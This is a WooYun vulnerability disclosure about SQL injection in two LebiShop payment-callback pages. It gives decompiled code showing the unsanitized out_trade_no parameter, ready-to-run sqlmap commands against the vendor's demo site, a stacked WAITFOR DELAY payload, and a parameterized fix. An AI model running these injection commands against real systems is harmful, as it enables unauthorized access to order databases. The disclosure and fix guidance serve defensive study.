Vulnerability Summary

Defect ID: wooyun-2015-099181

Title: LebiShop system SQL injection (3) (two injection points)

Vendor: www.lebi.cn

Author: hello

Submitted: 2015-03-05 11:14

Fix deadline: 2015-06-08 11:17

Published: 2015-06-08 11:17

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2015-03-05: Details sent to the vendor, awaiting vendor response
2015-03-10: Vendor actively ignored the vulnerability; details opened to third-party security partners
2015-05-04: Details opened to core white hats and domain experts
2015-05-14: Details opened to regular white hats
2015-05-24: Details opened to intern white hats
2015-06-08: Details made public

Brief description:

SQL injection in the latest version of the LebiShop mall system (two injection points), demonstrated on the official demo site.

Detailed description:

Injection point 1

http://demo.lebi.cn/onlinepay/tenpayJSDZ/payNotifyUrl.aspx

Source code (decompiled):
protected void Page_Load(object sender, EventArgs e)
{
    // Request["out_trade_no"] is taken from the query string, form body or cookies
    // and is used as-is: no validation, no escaping.
    string where = base.Request["out_trade_no"];
    Lebi_Order model = B_Lebi_Order.GetModel(where); // follow this call
    if (model == null)
    {
        base.Response.Write("系统错误"); // "system error": no row matched the WHERE clause
        base.Response.End();
    }
    else
    {
        TenpayUtil util = new TenpayUtil(model);
        ResponseHandler handler = new ResponseHandler(this.Context);
        ....

// GetModel as decompiled for Lebi_Order_Log; the Lebi_Order overload called above
// follows exactly the same pattern (see injection point 2 below).
public Lebi_Order_Log GetModel(string strWhere)
{
    // Only input containing the "lbsql{" marker somewhere after position 0 takes the
    // SQLPara path; everything else, e.g. "1>2", is concatenated straight into the SQL.
    if (strWhere.IndexOf("lbsql{") > 0)
    {
        SQLPara para = new SQLPara(strWhere, "", "");
        return this.GetModel(para);
    }
    StringBuilder builder = new StringBuilder();
    builder.Append("select top 1 * from [Lebi_Order_Log] ");
    builder.Append(" where " + strWhere); // strWhere is unsanitized: SQL injection
    Lebi_Order_Log log = new Lebi_Order_Log();
    DataSet set = SqlUtils.SqlUtilsInstance.TextExecuteDataset(builder.ToString());
    if (set.Tables[0].Rows.Count <= 0)
    {
        return null;
    }
    if (set.Tables[0].Rows[0]["id"].ToString() != "")
    {
        log.id = int.Parse(set.Tables[0].Rows[0]["id"].ToString());
    }
    if (set.Tables[0].Rows[0]["Order_id"].ToString() != "")
    {
        log.Order_id = int.Parse(set.Tables[0].Rows[0]["Order_id"].ToString());
    }
    if (set.Tables[0].Rows[0]["User_id"].ToString() != "")
    {
        log.User_id = int.Parse(set.Tables[0].Rows[0]["User_id"].ToString());
    }
    if (set.Tables[0].Rows[0]["Admin_id"].ToString() != "")
    {
        log.Admin_id = int.Parse(set.Tables[0].Rows[0]["Admin_id"].ToString());
    }
    log.Admin_Name = set.Tables[0].Rows[0]["Admin_Name"].ToString();
    log.Content = set.Tables[0].Rows[0]["Content"].ToString();
    if (set.Tables[0].Rows[0]["Time_Add"].ToString() != "")
    {
        log.Time_Add = DateTime.Parse(set.Tables[0].Rows[0]["Time_Add"].ToString());
    }
    return log;
}


Injection point 2

http://demo.lebi.cn/onlinepay/tenpayJSDZ/payReturnUrl.aspx

Source code (decompiled):

protected void Page_Load(object sender, EventArgs e)
{
    string where = base.Request["out_trade_no"]; // raw request value, no validation
    Lebi_Order model = B_Lebi_Order.GetModel(where); // follow this call
    if (model == null)
    {
        base.Response.Write("系统错误"); // "system error"
        base.Response.End();
    }
    else
    {
        TenpayUtil util = new TenpayUtil(model);
        ResponseHandler handler = new ResponseHandler(this.Context);
        handler.setKey(util.tenpay_key);
        // The Tenpay signature is only checked after the order lookup, so the
        // injected query below runs before any signature validation.
        if (handler.isTenpaySign())

// B_Lebi_Order.GetModel: same concatenation pattern as the Lebi_Order_Log version.
public Lebi_Order GetModel(string strWhere)
{
    if (strWhere.IndexOf("lbsql{") > 0)
    {
        SQLPara para = new SQLPara(strWhere, "", "");
        return this.GetModel(para);
    }
    StringBuilder builder = new StringBuilder();
    builder.Append("select top 1 * from [Lebi_Order] ");
    builder.Append(" where " + strWhere); // SQL injection here
    Lebi_Order order = new Lebi_Order();
    DataSet set = SqlUtils.SqlUtilsInstance.TextExecuteDataset(builder.ToString());
    if (set.Tables[0].Rows.Count <= 0)
Proof of concept:

Injection point 1
sqlmap scan

sqlmap -u "http://demo.lebi.cn/onlinepay/tenpayJSDZ/payNotifyUrl.aspx" --data "out_trade_no=1>2" --dbms "mssql" --technique=T --current-db --time-sec 10

Because Request["out_trade_no"] also reads the form body, the parameter can be sent as POST data (--data). The seed value 1>2 is a false condition that yields the baseline "系统错误" response, and --technique=T makes sqlmap confirm the injection with time-based blind probes (WAITFOR DELAY on MSSQL, 10 seconds here) before reading the current database name.

[Screenshot 555.png: sqlmap output]

[Screenshot 556.png: sqlmap output]

Injection point 2
sqlmap scan

sqlmap -u "http://demo.lebi.cn/onlinepay/tenpayJSDZ/payReturnUrl.aspx" --data "out_trade_no=1>2" --dbms "mssql" --technique=T --current-db --time-sec 10

[Screenshot 557.png: sqlmap output]

[Screenshot 558.png: sqlmap output]

Fix:

Sanitize the parameter. Concretely: stop passing a request value into GetModel(string strWhere) as a raw WHERE clause. Look the order up by its order-number column with a parameterized query, and reject out_trade_no values that do not match the expected order-number format. Both callback pages need the change.
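The vulnerable lookup beside a parameterized replacement, as an added example; this is illustration code written for this page, not LebiShop's own code. It assumes a [Lebi_Order] table whose order-number column is named [Order_No] (the report does not show the real column name) and an already-open SqlConnection; the target is SQL Server, matching the select top 1 syntax in the decompiled code.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Added example, not LebiShop code. Assumes a [Lebi_Order] table with an
// [Order_No] column (hypothetical name) holding the merchant order number
// that the payment gateway echoes back as out_trade_no.
public static class OrderLookup
{
    // Vulnerable shape, equivalent to what payNotifyUrl.aspx and payReturnUrl.aspx do:
    // the request value *is* the WHERE clause, so out_trade_no=1>2 becomes
    //   select top 1 * from [Lebi_Order] where 1>2
    // and a stacked "; WAITFOR DELAY '0:0:10'--" is executed just the same.
    public static string BuildVulnerableQuery(string strWhere)
    {
        return "select top 1 * from [Lebi_Order]  where " + strWhere;
    }

    // Hardened shape: the SQL text is a constant and the order number travels as a
    // typed parameter, so no value of outTradeNo can change the statement.
    public static DataRow GetOrderByTradeNo(SqlConnection conn, string outTradeNo)
    {
        // Defence in depth: an order number is short and alphanumeric; anything
        // else is rejected before the database is touched. The parameter below is
        // what actually closes the injection, this check only narrows the input.
        if (string.IsNullOrEmpty(outTradeNo) || outTradeNo.Length > 64)
        {
            return null;
        }
        foreach (char c in outTradeNo)
        {
            if (!char.IsLetterOrDigit(c) && c != '-' && c != '_')
            {
                return null;
            }
        }

        const string sql = "select top 1 * from [Lebi_Order] where [Order_No] = @tradeNo";
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@tradeNo", SqlDbType.NVarChar, 64).Value = outTradeNo;
            var table = new DataTable();
            using (SqlDataReader reader = cmd.ExecuteReader())
            {
                table.Load(reader);
            }
            return table.Rows.Count > 0 ? table.Rows[0] : null;
        }
    }
}
```

In the callback pages the caller would replace B_Lebi_Order.GetModel(where) with a lookup of this shape and keep the existing "no row, write 系统错误" branch unchanged. The GetModel(string strWhere) overloads should not remain reachable from request data at all; whether the "lbsql{" / SQLPara branch is safe cannot be judged from the decompiled fragments shown here, so it should be treated as untrusted too.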

Copyright notice: reprints must credit the source, hello@WooYun


Vulnerability Response

Vendor response:

Severity: No impact, vendor ignored

Ignored on: 2015-06-08 11:17

Vendor reply:

Latest status:

None